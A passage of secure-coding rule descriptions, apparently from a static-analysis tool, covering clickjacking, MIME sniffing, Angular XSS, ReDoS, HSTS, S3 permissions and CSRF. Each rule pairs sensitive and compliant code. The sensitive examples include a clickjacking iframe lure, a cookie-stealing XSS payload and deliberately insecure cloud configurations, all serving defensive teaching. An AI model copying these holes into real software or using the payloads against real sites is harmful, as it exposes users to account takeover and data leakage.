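// Permissions are attached to roles, never ad hoc to individual users,
// and unknown roles or permissions are denied by default.
const rolePermissions = {
  admin: new Set(['read', 'write', 'manage-users']),
  user:  new Set(['read']),
};

function can(role, permission) {
  const perms = rolePermissions[role];
  return perms !== undefined && perms.has(permission);
}
```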

Sensitive Code Example

Imports System.Threading
Imports System.Security.Permissions
Imports System.Security.Principal
Imports System.IdentityModel.Tokens

Class SecurityPrincipalDemo
    Class MyIdentity
        Implements IIdentity ' Sensitive, custom IIdentity implementations should be reviewed
    End Class

    Class MyPrincipal
        Implements IPrincipal ' Sensitive, custom IPrincipal implementations should be reviewed
    End Class

    <System.Security.Permissions.PrincipalPermission(SecurityAction.Demand, Role:="Administrators")> ' Sensitive. The access restrictions enforced by this attribute should be reviewed.
    Private Shared Sub CheckAdministrator()
        Dim MyIdentity As WindowsIdentity = WindowsIdentity.GetCurrent() ' Sensitive

        HttpContext.User = ... ' Sensitive: review all reference (set and get) to System.Web HttpContext.User

        Dim domain As AppDomain = AppDomain.CurrentDomain
        domain.SetPrincipalPolicy(PrincipalPolicy.WindowsPrincipal) ' Sensitive

        Dim identity As MyIdentity = New MyIdentity() ' Sensitive
        Dim MyPrincipal As MyPrincipal = New MyPrincipal(MyIdentity) ' Sensitive
        Thread.CurrentPrincipal = MyPrincipal ' Sensitive
        domain.SetThreadPrincipal(MyPrincipal) ' Sensitive

        Dim principalPerm As PrincipalPermission = New PrincipalPermission(Nothing, "Administrators")  ' Sensitive
        principalPerm.Demand()

        Dim handler As SecurityTokenHandler = ...
        Dim identities As ReadOnlyCollection(Of ClaimsIdentity) = handler.ValidateToken()  ' Sensitive, this creates identity
    End Sub

    ' Sensitive: review how this function uses the identity and principal.
    Private Sub modifyPrincipal(ByVal identity As MyIdentity, ByVal principal As MyPrincipal)
    End Sub
End Class

See

typescript:S5732

Clickjacking attacks occur when an attacker tricks a user into clicking certain buttons/links of a legitimate website. This attack can take place with malicious HTML frames well hidden in an attacker's website.

For instance, suppose a safe and authentic page of a social network (https://socialnetworkexample.com/makemyprofilpublic) allows a user to change the visibility of their profile by clicking a button. This is a critical feature with high privacy concerns. Users are generally well informed on the social network of the consequences of this action. An attacker can trick users into performing this action, without their consent, with the below code embedded in a malicious website:

<html>
<b>Click on the button below to win 5000$</b>
<br>
<iframe src="https://socialnetworkexample.com/makemyprofilpublic" width="200" height="200"></iframe>
</html>

By playing with the size of the iframe, it is sometimes possible to display only the critical parts of a page, in this case the button of the makemyprofilpublic page.

Ask Yourself Whether

  • Critical actions of the application are prone to clickjacking attacks because a simple click on a link or a button can trigger them.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the content security policy frame-ancestors directive, which is supported by all modern browsers and specifies the origins that are allowed to embed the page in a frame (this directive deprecates X-Frame-Options).

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet-csp or helmet middleware is used without the frameAncestors directive (or if frameAncestors is set to 'none'):

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'none'"] // Sensitive: frameAncestors  is set to none
    }
  })
);

Compliant Solution

In an Express.js application, a standard way to implement the CSP frame-ancestors directive is the helmet-csp or helmet middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'example.com'"] // Compliant
    }
  })
);
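Behind the middleware, this directive is just one response header. A framework-agnostic sketch (assumption: this mirrors the serialization the middleware performs) of building the Content-Security-Policy header value:

```javascript
// Serialize a directives object into a Content-Security-Policy header value,
// e.g. { 'frame-ancestors': ["'self'"] } -> "frame-ancestors 'self'".
function cspHeaderValue(directives) {
  return Object.entries(directives)
    .map(([name, values]) => [name, ...values].join(' '))
    .join('; ');
}

// A page that may only be embedded by frames served from example.com:
const header = cspHeaderValue({ 'frame-ancestors': ['example.com'] });
```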

See

typescript:S5734

MIME confusion attacks occur when an attacker successfully tricks a web browser into interpreting a resource as a different type than the one expected. To correctly interpret a resource (script, image, stylesheet …), web browsers look for the Content-Type header defined in the HTTP response received from the server, but often this header is not set or is set with an incorrect value. To avoid content-type mismatches and to provide the best user experience, web browsers try to deduce the right content-type, generally by inspecting the content of the resource (the first bytes). This "guess mechanism" is called MIME type sniffing.

Attackers can take advantage of this feature when a website ("example.com" here) allows arbitrary files to be uploaded. In that case, an attacker can upload a malicious image fakeimage.png (containing malicious JavaScript code or a polyglot content file) such as:

<script>alert(document.cookie)</script>

When the victim visits the website showing the uploaded image, the malicious script embedded in the image will be executed by web browsers that perform MIME type sniffing.

Ask Yourself Whether

  • Content-Type header is not systematically set for all resources.
  • Content of resources can be controlled by users.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Implement the X-Content-Type-Options header with the nosniff value (the only existing value for this header), which is supported by all modern browsers and prevents browsers from performing MIME type sniffing, so that in case of a Content-Type header mismatch the resource is not interpreted. For example, within a <script> element context, JavaScript MIME types (like application/javascript) are expected in the Content-Type header.

Sensitive Code Example

In an Express.js application, the code is sensitive if, when using helmet, the noSniff middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet({
    noSniff: false, // Sensitive
  })
);

Compliant Solution

When using helmet in an Express.js application, the noSniff middleware should be enabled (it is enabled by default):

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.noSniff());
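The middleware above boils down to adding one response header. Sketched without helmet, over a plain headers object (the helper name is hypothetical):

```javascript
// Add the X-Content-Type-Options header to a plain headers object; the
// nosniff value instructs browsers not to MIME-sniff the response.
function withNoSniff(headers) {
  return { ...headers, 'X-Content-Type-Options': 'nosniff' };
}
```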

See

typescript:S6268

Angular prevents XSS vulnerabilities by treating all values as untrusted by default. Untrusted values are systematically sanitized by the framework before they are inserted into the DOM.

Still, developers have the ability to manually mark a value as trusted if they are sure that the value is already sanitized. Accidentally trusting malicious data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or impersonating other users.

Ask Yourself Whether

  • The value for which sanitization has been disabled is user-controlled.
  • It’s difficult to understand how this value is constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid including dynamic executable code and thus disabling Angular’s built-in sanitization unless it’s absolutely necessary. Try instead to rely as much as possible on static templates and Angular built-in sanitization to define web page content.
  • Make sure to understand how the value to consider as trusted is constructed and never concatenate it with user-controlled data.
  • Make sure to choose the correct DomSanitizer "bypass" method based on the context. For instance, only use bypassSecurityTrustUrl to trust URLs in an href attribute context.

Sensitive Code Example

import { Component, OnInit } from '@angular/core';
import { DomSanitizer, SafeHtml } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello" [innerHTML]="hello"></div>'
})
export class HelloComponent implements OnInit {
  hello: SafeHtml;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    let name = this.route.snapshot.queryParams.name;
    let html = "<h1>Hello " + name + "</h1>";
    this.hello = this.sanitizer.bypassSecurityTrustHtml(html); // Sensitive
  }
}

Compliant Solution

import { Component, OnInit } from '@angular/core';
import { DomSanitizer } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello"><h1>Hello {{name}}</h1></div>',
})
export class HelloComponent implements OnInit {
  name: string;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    this.name = this.route.snapshot.queryParams.name;
  }
}
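For context, Angular's interpolation escapes markup before inserting values into the DOM, which is why the compliant template is safe. A minimal sketch of that kind of escaping (illustrative only, not Angular's actual implementation):

```javascript
// Replace the characters that carry meaning in HTML with entities, so
// user-controlled text cannot introduce new elements or attributes.
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}
```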

See

typescript:S5852

Most regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input; in some cases this can cause performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, meaning that a small carefully-crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact with, in this case, a large carefully-crafted input (thousands of chars).

This rule determines the runtime complexity of a regular expression and informs you if it is not linear.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen.

  • If you have a repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
  • If you have multiple repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition, if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example str.split(/\s*,/) will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of ways the inner group can be matched by the outer quantifier. For instance, the nested quantifier in (ba+)+ doesn’t cause performance issues, because the inner group can be matched only if there is exactly one b char per repetition of the group.
  • Optimize regular expressions by emulating possessive quantifiers and atomic grouping.
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match, especially when the regex is not anchored to the beginning of the string, in which case it is quite hard to avoid quadratic runtimes. In those cases consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementation such as Google’s RE2 or node-re2.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace str.split(/\s*,\s*/) with str.split(",") and then trimming the spaces from the strings as a second step.
  • It is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course this means that you’ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were matched or not and then ignoring the match if they weren’t. For example the regex x*y could be replaced with x*(y)? and then the call to str.match(regex) could be replaced with matched = str.match(regex) and matched[1] !== undefined.
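The multiple-passes strategy above can be sketched as follows (the helper name is hypothetical):

```javascript
// Two-pass replacement for str.split(/\s*,\s*/): split on the literal
// comma (linear time), then trim whitespace from each piece as a second step.
function splitAndTrim(str) {
  return str.split(',').map(part => part.trim());
}
```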

Sensitive Code Example

The evaluation of this regex will, in practice, never end:

/(a+)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Sensitive

Compliant Solution

Possessive quantifiers do not keep backtracking positions, and thus can be used, if possible, to avoid performance issues. Unfortunately, they are not supported in JavaScript, but one can still mimic them using lookahead assertions and backreferences:

/((?=(a+))\2)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Compliant

See

typescript:S5730

Mixed content occurs when a resource is loaded over the HTTP protocol on a website accessed over the HTTPS protocol. Mixed content is not encrypted and thus exposed to MITM attacks, and it can break the entire level of protection that implementing encryption with the HTTPS protocol was meant to provide.

The main threat with mixed content is not only the confidentiality of resources but the integrity of the whole website:

  • Passive mixed content (eg: <img src="http://example.com/picture.png">) allows an attacker to access and replace only these resources, like images, with malicious ones that could lead to successful phishing attacks.
  • With active mixed content (eg: <script src="http://example.com/library.js">) an attacker can compromise the entire website, for example by injecting malicious JavaScript code (accessing and modifying the DOM, stealing cookies, etc).
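The distinction comes down to the page's scheme versus the resource's scheme; a small sketch using the WHATWG URL class (the function name is hypothetical):

```javascript
// A resource is mixed content when an https:// page loads it over http://.
function isMixedContent(pageUrl, resourceUrl) {
  return new URL(pageUrl).protocol === 'https:' &&
         new URL(resourceUrl).protocol === 'http:';
}
```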

Ask Yourself Whether

  • The HTTPS protocol is in place and external resources are fetched from the website pages.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the content security policy block-all-mixed-content directive, which is supported by all modern browsers and blocks the loading of mixed content.

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet-csp or helmet middleware is used without the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com']
    } // Sensitive: blockAllMixedContent directive is missing
  })
);

Compliant Solution

In an Express.js application, a standard way to block mixed content is to put in place the helmet-csp or helmet middleware with the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com'],
      blockAllMixedContent: [] // Compliant
    }
  })
);

See

typescript:S5736

The HTTP Referer header contains a URL set by web browsers and used by applications to track where the user came from. It is, for instance, a relevant value for web analytics services, but it can cause serious privacy and security problems if the URL contains confidential information. Note that Firefox, for instance, removes path information from the Referer header while browsing privately, to prevent data leaks.

Suppose an e-commerce website asks the user for their credit card number to purchase a product:

<html>
<body>
<form action="/valid_order" method="GET">
Type your credit card number to purchase products:
<input type=text id="cc" value="1111-2222-3333-4444">
<input type=submit>
</form>
</body>

When the above HTML form is submitted, an HTTP GET request will be performed and the URL requested will be https://example.com/valid_order?cc=1111-2222-3333-4444, with the credit card number inside. This is obviously not secure, for these reasons:

  • URLs are stored in the history of browsers.
  • URLs could be accidentally shared when doing copy/paste actions.
  • URLs can be stolen if a malicious person looks at the computer screen of a user.

In addition to these threats, when further requests are performed from the "valid_order" page with a simple legitimate embedded script like this:

<script src="https://webanalyticservices_example.com/track">

The Referer header, which contains confidential information, will be sent to a third-party web analytics service and cause a privacy issue:

GET /track HTTP/2.0
Host: webanalyticservices_example.com
Referer: https://example.com/valid_order?cc=1111-2222-3333-4444

Ask Yourself Whether

  • Confidential information exists in URLs.
  • The semantics of HTTP methods are not respected (eg: a GET method is used instead of POST when the state of the application is changed).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Confidential information should not be set inside URLs (GET requests) of the application, and a safe Referrer-Policy header (ie: different from unsafe-url or no-referrer-when-downgrade) should be used to control how much information is included in the Referer header.

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet referrerPolicy middleware is disabled or used with no-referrer-when-downgrade or unsafe-url:

const express = require('express');
const helmet = require('helmet');

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer-when-downgrade' // Sensitive: no-referrer-when-downgrade is used
  })
);

Compliant Solution

In an Express.js application, a secure solution is to use the helmet referrer policy middleware set to no-referrer:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer' // Compliant
  })
);
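Without helmet, the same protection is one header on each response; a framework-agnostic sketch over a plain headers object (the helper name is hypothetical):

```javascript
// Attach a Referrer-Policy header so browsers send no Referer at all
// (or whichever policy the caller chooses).
function withReferrerPolicy(headers, policy = 'no-referrer') {
  return { ...headers, 'Referrer-Policy': policy };
}
```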

See

typescript:S5739

When implementing the HTTPS protocol, websites usually continue to support the HTTP protocol in order to redirect users to HTTPS when they request an HTTP version of the website. These redirects are not encrypted and are therefore vulnerable to man-in-the-middle attacks. The Strict-Transport-Security policy header (HSTS) set by an application instructs the web browser to convert any HTTP request to HTTPS.

Web browsers that see the Strict-Transport-Security policy header for the first time record information specified in the header:

  • the max-age directive, which specifies how long the policy should be kept on the web browser.
  • the includeSubDomains optional directive, which specifies whether the policy should apply to all sub-domains or not.
  • the preload optional directive, which is not part of the HSTS specification but is supported on all modern web browsers.

With the preload directive the web browser never connects to the website over HTTP. To use this directive, the application concerned must be submitted to a preload service maintained by Google.

Ask Yourself Whether

  • The website is accessible with the unencrypted HTTP protocol.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the Strict-Transport-Security policy header; it is recommended to apply this policy to all subdomains (includeSubDomains) and for at least 6 months (max-age=15552000), or even better for 1 year (max-age=31536000).

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet or hsts middleware is disabled or used without the recommended values:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 3153600, // Sensitive, recommended >= 15552000
  includeSubDomains: false // Sensitive, recommended 'true'
}));

Compliant Solution

In an Express.js application, a standard way to implement HSTS is with the helmet or hsts middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 31536000,
  includeSubDomains: true
})); // Compliant
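For reference, the raw header value the middleware above emits is small; a sketch of building it (assumption: based on the syntax defined in RFC 6797):

```javascript
// Build a Strict-Transport-Security header value, e.g.
// "max-age=31536000; includeSubDomains".
function hstsHeaderValue(maxAgeSeconds, includeSubDomains) {
  let value = `max-age=${maxAgeSeconds}`;
  if (includeSubDomains) value += '; includeSubDomains';
  return value;
}
```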

See

typescript:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PUBLIC_READ, PUBLIC_READ_WRITE grant respectively "read" and "read and write" privileges to anyone, either authenticated or anonymous (AllUsers group).
  • AUTHENTICATED_READ grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to only grant users the necessary permissions for their required tasks. In the context of canned ACLs, set the ACL to PRIVATE (the default), and if more granularity is needed, use an appropriate S3 policy.

Sensitive Code Example

All users, either authenticated or anonymous, have read and write permissions with the PUBLIC_READ_WRITE access control:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

Compliant Solution

With the PRIVATE access control (default), only the bucket owner has the read/write permissions on the bucket and its ACL.

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

See

typescript:S5743

By default, web browsers perform DNS prefetching to reduce the latency of the DNS resolutions required when a user clicks links on a website page.

For instance on example.com the hyperlink below contains a cross-origin domain name that must be resolved to an IP address by the web browser:

<a href="https://otherexample.com">go on our partner website</a>

It can add significant latency during requests, especially if the page contains many links to cross-origin domains. DNS prefetching allows web browsers to perform DNS resolution in the background before the user clicks a link. This feature can cause privacy issues because DNS resolution from the user’s computer is performed without their consent if they don’t intend to visit the linked website.

On a complex private webpage, a combination "of unique links/DNS resolutions" can indicate, to an eavesdropper for instance, that the user is visiting the private page.

Ask Yourself Whether

  • Links to cross-origin domains could result in leakage of confidential information about the user’s navigation/behavior of the website.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the X-DNS-Prefetch-Control header with an off value, keeping in mind that this could significantly degrade website performance.

Sensitive Code Example

In an Express.js application, the code is sensitive if the dns-prefetch-control middleware is disabled or used without the recommended value:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: true // Sensitive: allowing DNS prefetching is security-sensitive
  })
);

Compliant Solution

In an Express.js application, the dns-prefetch-control or helmet middleware is the standard way to implement the X-DNS-Prefetch-Control header:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: false // Compliant
  })
);

See

typescript:S2598

Why is this an issue?

If the file upload feature is implemented without proper folder restriction, it will result in an implicit trust violation within the server, as trusted files will be implicitly stored alongside third-party files that should be considered untrusted.

This can allow an attacker to disrupt the security of an internal server process or the running application.

What is the potential impact?

After discovering this vulnerability, attackers may attempt to upload as many different file types as possible, such as JavaScript files, bash scripts, malware, or malicious configuration files targeting potential processes.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Full application compromise

In the worst-case scenario, the attackers succeed in uploading a file recognized by an internal tool, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

Server Resource Exhaustion

By repeatedly uploading large files, an attacker can consume excessive server resources, resulting in a denial of service.

If the component affected by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service can only affect the attacker who caused it.

Even though a denial of service might have little direct impact, it can have secondary impact in architectures that use containers and container orchestrators. For example, it can cause unexpected container failures or overuse of resources.

In some cases, it is also possible to force the product to "fail open" when resources are exhausted, which means that some security features are disabled in an emergency.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Formidable

Code examples

Noncompliant code example

const Formidable = require('formidable');

const form          = new Formidable(); // Noncompliant
form.uploadDir      = "/tmp/";
form.keepExtensions = true;

Compliant solution

const Formidable = require('formidable');

const form          = new Formidable();
form.uploadDir      = "/uploads/";
form.keepExtensions = false;

How does this work?

Use pre-approved folders

Create a special folder where untrusted data should be stored. This folder should be classified as untrusted and have the following characteristics:

  • It should have specific read and write permissions that belong to the right people or organizations.
  • It should have a size limit or its size should be monitored.
  • It should contain backup copies if it contains data that belongs to users.

This folder should not be located in /tmp, /var/tmp or in the Windows directory %TEMP%.
These folders are usually "world-writable", can be manipulated, and can be accidentally deleted by the system.

Also, the original file names and extensions should be changed to controlled strings to prevent unwanted code from being executed based on the file names.

Resources

typescript:S5742

Certificate Transparency (CT) is an open framework to protect against identity theft when certificates are issued. Certificate Authorities (CAs) electronically sign certificates after verifying the identity of the certificate owner. Attackers use, among other things, social engineering attacks to trick a CA into verifying a spoofed identity/forged certificate.

CAs implement the Certificate Transparency framework by publicly logging the records of newly issued certificates, allowing the public, and in particular the identity owner, to monitor these logs to verify that their identity was not usurped.

Ask Yourself Whether

  • The website identity is valuable and well-known, therefore prone to theft.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement the Expect-CT HTTP header, which instructs the web browser to check public CT logs in order to verify whether the website's certificate appears in them; if it does not, the browser will block the request and display a warning to the user.

Sensitive Code Example

In an Express.js application, the code is sensitive if the expect-ct middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
    helmet({
      expectCt: false // Sensitive
    })
);

Compliant Solution

In an Express.js application, the expect-ct middleware is the standard way to implement Expect-CT. Usually, the deployment of this policy starts in report-only mode (enforce: false) with a low maxAge value (the number of seconds the policy will apply); then, if everything works well, it is recommended to block future connections that violate the Expect-CT policy (enforce: true) with a greater value for the maxAge directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.expectCt({
  enforce: true,
  maxAge: 86400
})); // Compliant
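For reference, the resulting header value is small; a sketch of building it (assumption: follows the Expect-CT draft's "max-age" and "enforce" directive syntax):

```javascript
// Build an Expect-CT header value, e.g. "max-age=86400, enforce".
function expectCtHeaderValue(maxAgeSeconds, enforce) {
  return `max-age=${maxAgeSeconds}${enforce ? ', enforce' : ''}`;
}
```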

See

typescript:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium, they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration: a volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-explicit', {
      availabilityZone: 'us-west-2a',
      size: Size.gibibytes(1),
      encrypted: false // Sensitive
    });

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-implicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
    }); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'encrypted-explicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
      encrypted: true
    });

See

typescript:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant users only the permissions necessary for their required tasks. In the context of resource-based policies, list the principals that need access and grant them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AnyPrincipal()] // Sensitive
}))

Compliant Solution

This policy allows only the authorized users:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AccountRootPrincipal()]
}))

See

typescript:S6249

By default, S3 buckets can be accessed through the HTTP and HTTPS protocols.

As HTTP is a clear-text protocol, it lacks the encryption of transported data, as well as the capability to build an authenticated connection. It means that a malicious actor who is able to intercept traffic from the network can read, modify or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enforce HTTPS-only access by setting the enforceSSL property to true.

Sensitive Code Example

Access to S3 bucket objects through TLS is not enforced by default:

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example'); // Sensitive

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example', {
    bucketName: 'example',
    versioned: true,
    publicReadAccess: false,
    enforceSSL: true
});

See

typescript:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that they did not intend, such as updating their profile or sending a message, or more generally anything that can change the state of the application.

The attacker can trick the user/victim into clicking a link corresponding to the privileged action, or into visiting a malicious website that embeds a hidden web request. Because web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token.
  • Of course, sensitive operations should never be performed with safe HTTP methods such as GET, which are designed to be used only for information retrieval.

Sensitive Code Example

Express.js CSURF middleware protection is not applied to an unsafe HTTP method such as POST:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie: true });

let app = express();

// Sensitive: this operation does not appear to be protected by the CSURF middleware (csrfProtection is not used)
app.post('/money_transfer', parseForm, function (req, res) {
  res.send('Money transferred');
});

Protection provided by Express.js CSURF middleware is globally disabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["POST", "GET"] })); // Sensitive as POST is an unsafe method

Compliant Solution

Express.js CSURF middleware protection is used on unsafe methods:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie:  true });

let app = express();

